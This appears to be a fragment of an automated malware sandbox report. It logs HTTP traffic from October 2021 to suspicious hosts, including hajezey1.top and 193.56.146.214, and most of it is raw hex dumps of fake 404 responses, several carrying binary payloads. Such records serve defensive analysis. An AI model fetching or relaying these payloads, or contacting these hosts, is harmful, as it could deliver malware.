ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:02 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 37 33 33 0d 0a b8 00 00 00 c7 1a b3 fa 05 54 a4 5f 28 1e c5 73 c8 bb 6f 2d ae 22 c0 a9 8f 89 bd 2a 1c 21 f8 64 eb 16 a1 85 cc be 11 ce 58 26 9a 05 1e 5c c6 c1 69 3a 30 5b 9b c4 28 c2 ef 63 ab b5 4a e8 89 6e 9c 3d f7 c6 fe 06 43 1d 42 b0 fa b9 17 9d bc 30 e1 7d b4 71 0c f3 55 ca a6 9d 45 22 ea 9d de 0a 6c 39 20 12 7c 4b 07 4c f2 97 87 24 3a c2 ff e2 61 c9 ff 82 3e 8d 64 f6 2c 24 84 19 bd fa 7b 18 4f ce fd ab 1c f3 bb 9d 70 2b 2b eb ec 0b b0 37 d1 d7 3d 24 bb 29 51 24 7c 4e e0 35 9d 11 e0 42 10 5e 4d 2f 68 41 22 93 01 8f 26 1e 4b e8 70 6a ed 03 43 fd b3 0a b8 09 cd 31 c3 31 00 76 26 05 00 99 e1 70 64 01 08 02 00 05 00 9c 03 00 00 8f 53 a0 cd 6b ff f3 42 ef be 5f a6 0b 12 1e 00 fa 2d 5f bc 60 48 43 c4 3f a0 d1 42 cb fe 22 d0 1e 94 d6 c5 1a 29 6e 08 cd c8 2d c7 4d 7e 61 df 49 1a 97 84 14 51 2c 4c e4 c5 d6 02 94 b8 c5 49 53 0d 5e 82 e6 83 ab 8e 62 c5 9d 46 0b a0 aa 3e c7 fd d6 bc a4 ad e8 3c 50 ba e0 3c fe e9 66 4d 4e a6 6b ea 3a 3d ce 29 2a 37 e9 6c 89 d6 f5 15 31 cc 37 72 61 7e 22 b0 24 77 36 7c 4e 6b 9a aa 32 ae ff ad 7d d1 69 71 5e 52 c5 cc 89 d6 bb fa 1e 30 d1 95 9d 4c 69 ee fe ef 04 01 d8 3e 1b 87 e4 46 c1 6e fb 21 19 c0 a0 dd 94 37 60 40 b8 71 82 cf 26 ba ba 93 8d d0 d2 c2 59 ae 5a 2b f1 dd f6 78 90 66 b1 4e ca f3 88 94 76 73 aa 67 95 39 13 f9 1a 7e db 59 b0 5a be ea a7 57 2c da 41 2f 3b 44 99 a6 d1 e3 ae 5d 44 1c 04 12 87 6b 36 97 f0 39 ba 17 30 82 22 5d 97 9c 25 f8 0f 01 a5 f3 47 51 4b c6 6c ab e9 ee 5b 16 36 f0 62 25 02 ed 05 a6 10 4e c2 e6 19 fe 62 4e c5 5b d6 25 26 c8 0b 8d ec 99 23 41 05 8c 38 bb 0c c3 e8 42 32 14 41 b7 83 9c af 9a 27 3e 5a 59 7c a3 5e ee 1c 9c 12 fc 53 8b e3 c9 3c 9d f9 b6 c4 e6 9f 86 54 45 f9 ea dc e7 d2 62 dd f4 b6 fc 61 49 d6 3d 2d fb 53 9e df 18 af 5e 30 3d 56 2a 0f 38 20 a4 0d c3 98 c2 87 1d fd 7b 76 27 90 ad 0d f8 1c 82 12 74 be 06 e5 be c0 91 3d 8d d9 76 35 3a 86 ce 8b 57 89 6b 9e 6b 94 4b fe 6e 7b 84 16 f5 b4 5c b4 8f df 2a 68 2b 33 43 0b 6e 60 35 e6 3b 93 c5 fd e6 62 80 69 e2 92 79 02 9e 47 77 90 92 90 52 4f cf 29 e7 8b 19 b7 16 d5 1a 92 65 37 c9 26 3c 17 27 bd 55 08 ce c3 07 7a 53 f1 6f 43 0a 86 a0 32 60 f8 0d f1 24 e9 e4 c0 fb cd ae cb cb 6c 00 9c ef 2f 87 07 95 d6 a2 32 a9 f4 6b d7 2c e8 2c 27 c2 b7 00 ef 75 ec d5 58 86 2a ad a4 97 43 9a 52 8f 28 e9 1b ce e1 d3 d0 78 92 a0 ab 1e e0 dd 3d cc e0 5a 14 90 1d 7d 10 44 b2 b1 04 a8 db 37 c3 a1 bb 3b 1c f8 3e 56 ed 73 dd 7d b0 6b 95 36 fd 00 c5 00 b0 6f 9b 2b 71 fb 79 82 a6 e1 23 c2 b9 8a a8 89 62 ba 2d 12 c6 52 d3 b1 97 b5 64 20 e9 05 e7 b4 dd e7 89 3a 3b a5 25 ec 86 96 39 8e 21 04 ab 93 4a ec 81 e7 55 81 50 94 e0 5b 5b 40 17 8f ac 1e 17 68 a5 e6 f4 09 11 8f 34 77 8f dc 57 87 c9 7d d9 e7 6b 23 6c 4e d0 db 94 61 ae f2 5c 36 c5 15 c9 a7 a3 39 4b 2b 05 81 e2 8b cf fa 08 90 e8 55 0c 8b 78 14 91 04 c2 44 ed b6 c6 17 7c 82 6c 40 c6 ec b6 91 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:03 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 39 33 38 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 1d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 85 a5 24 d1 ee 12 d7 a8 78 27 4c 76 46 ea d6 2c 43 64 1b 67 c4 62 1c 74 29 44 86 43 af 6f a0 68 8a 59 6d 82 4a a7 cf 1f c6 a3 13 69 4a 24 b3 ea 27 63 13 57 70 50 68 6a 3e e0 2f 7a 70 79 23 e3 d8 2f 09 13 72 9b be 7c 42 bf 19 de 6c dc 13 55 70 53 0a 46 17 7c e7 ba 3f dc 9e 2e c9 81 e8 ce 05 4c c4 c1 52 3a 54 6b ad 87 f9 07 87 d6 41 c9 b0 26 1c 94 30 99 7f 5b 92 2a 93 5b af a8 98 7a bd 0b e2 a4 22 3e 1a 20 cc cc b6 ca 21 af ad f5 31 a1 a3 cf 37 1f 5a eb 3f 5c c5 74 59 90 8f f5 06 b6 0e cd 9a df a5 61 69 fd 70 12 70 df ce 22 db e0 ab ab b6 2e 08 8f ff dd 4c 76 20 e1 ff 38 5c 3f 0f 83 d0 20 38 ba 60 bd 59 22 09 79 53 40 98 e3 94 54 f0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1f f1 69 d5 92 4e 76 8c 96 bd 4a 16 e9 37 a2 55 6b 5f c7 ae 4a 88 54 d9 4e 3d b6 7b 93 fe 88 2c 93 7e 87 12 75 d7 9a db 05 a9 46 75 18 c7 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 69 4f 44 88 fe 40 0a 5c 69 ba e8 33 74 16 00 89 12 1e 0d 63 bb 9c d4 46 d1 64 3b df d5 af 2b 02 57 d3 db 53 3d a0 c3 96 8b 7d 64 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 2e 64 35 e2 26 2c 74 a4 34 54 05 91 5f ef 6c 05 23 8f f5 4a b0 de 7f 0d 6a f3 d8 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 92 d6 ea 8c 11 7d 72 d7 6a ab c1 39 e2 23 13 96 c4 66 d1 30 80 06 10 b2 9c 78 c6 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff f3 53 5d b5 78 3d f1 24 a0 e9 37 7f 3b 60 ff f1 ee 71 c0 b6 4f 4d bb 75 4b 53 06 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 d3 03 e8 e9 32 2c 0d 90 db 4f f4 47 d3 1c 4c 93 19 c0 0d 04 7d 76 88 52 8c 2a 01 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 28 48 94 14 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 34 30 30 36 61 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 9c a2 ae 7a b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c af 3a 05 14 a5 5d ef 3b f3 56 72 bc 3d 1a 04 b2 50 2a 87 d6 17 8f 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 7a 6d 2e e6 2a 7e d7 3f dc 9e 2e cb 81 a8 